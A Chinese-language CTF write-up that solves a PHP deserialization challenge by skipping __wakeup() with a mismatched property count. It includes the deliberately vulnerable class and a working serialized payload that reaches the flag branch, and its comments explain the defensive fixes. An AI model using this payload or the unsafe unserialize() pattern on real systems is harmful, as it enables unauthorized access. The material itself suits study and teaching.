题目链接

页面源码

明显存在反序列化漏洞,但反序列化时会自动调用 __wakeup() 函数,对 passwd 做 sha1 哈希(单向运算,难以逆转),因此无法直接让 passwd 等于 "wllm"。

<?php
// Responses are declared as UTF-8 HTML, so anything echoed later is rendered as markup by the browser.
header("Content-type:text/html;charset=utf-8");
// Turns off all PHP error reporting; warnings and notices raised further down are not shown.
error_reporting(0);
// Prints the highlighted source of class.php in the response (presumably this file itself —
// the challenge discloses its own code on purpose; confirm against the deployment).
show_source("class.php");

/**
 * Deliberately vulnerable challenge class.
 *
 * Its magic methods act on property values that, once the object is created by
 * unserialize(), are chosen entirely by whoever supplied the serialized string.
 */
class HaHaHa{
// Public properties: restored verbatim from serialized input.
public $admin;
public $passwd;

/**
 * Sets the defaults for a normally constructed object.
 * unserialize() does not call the constructor, so these defaults do not apply to
 * deserialized instances.
 */
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}

/**
 * Deserialization hook: replaces passwd with its SHA-1 hex digest.
 *
 * When this runs, passwd becomes a 40-character hex string and the strict comparison
 * with "wllm" in __destruct() cannot succeed.
 * NOTE(review): this hook is the only thing separating untrusted input from the flag
 * branch; a deserialization hook is not an access control and must not be relied on as one.
 */
public function __wakeup(){
$this->passwd = sha1($this->passwd);
}

/**
 * Runs when the object is destroyed and decides what is written to the response.
 */
public function __destruct(){
// Strict (===) comparison of both properties against fixed strings.
if($this->admin === "admin" && $this->passwd === "wllm"){
// $flag is presumably defined by flag.php — not visible here.
include("flag.php");
echo $flag;
}else{
// NOTE(review): passwd is echoed without escaping into a text/html response; if
// __wakeup() did not run, this is the raw caller-supplied string.
echo $this->passwd;
echo "No wake up";
}
}
}
// SECURITY: the raw query parameter "p" is passed straight to unserialize(). The client
// therefore controls which class is instantiated and every property value, and the
// object's magic methods (__wakeup, __destruct) run on that state.
// Untrusted data should be decoded with json_decode() instead; where unserialize() cannot
// be avoided, restrict it with ['allowed_classes' => false] and keep security decisions
// out of magic methods.
$Letmeseesee = $_GET['p'];
// The return value is discarded, so the object is destroyed (and __destruct() runs)
// as soon as it has been created.
unserialize($Letmeseesee);

绕过wakeup

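PHP 特性:当序列化字符串中声明的对象成员个数与实际成员个数不符时(如本例中声明 3 个、实际只有 2 个),不会调用 __wakeup()。该行为属于旧版本 PHP 的缺陷,新版本已修复;从防御角度看,不应把 __wakeup() 当作安全校验,也不应对不可信输入调用 unserialize()。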

<?php
// Local stand-in for the challenge class, used only to produce its serialized form.
// It declares just the two properties, preset to the values the challenge's
// __destruct() compares against; no magic methods are needed here.
class HaHaHa{
public $admin = "admin";
public $passwd = "wllm";
}

# Print the serialized representation of a fresh instance.
echo serialize(new HaHaHa) . "\n";

# Output: O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
# Changing the declared property count from 2 to 3 gives O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
# Sending that value returns the flag.
# NOTE: the declared count (3) no longer matches the two properties actually present; on
# older PHP builds this mismatch causes __wakeup() to be skipped while __destruct() still
# runs. Current PHP releases no longer behave this way.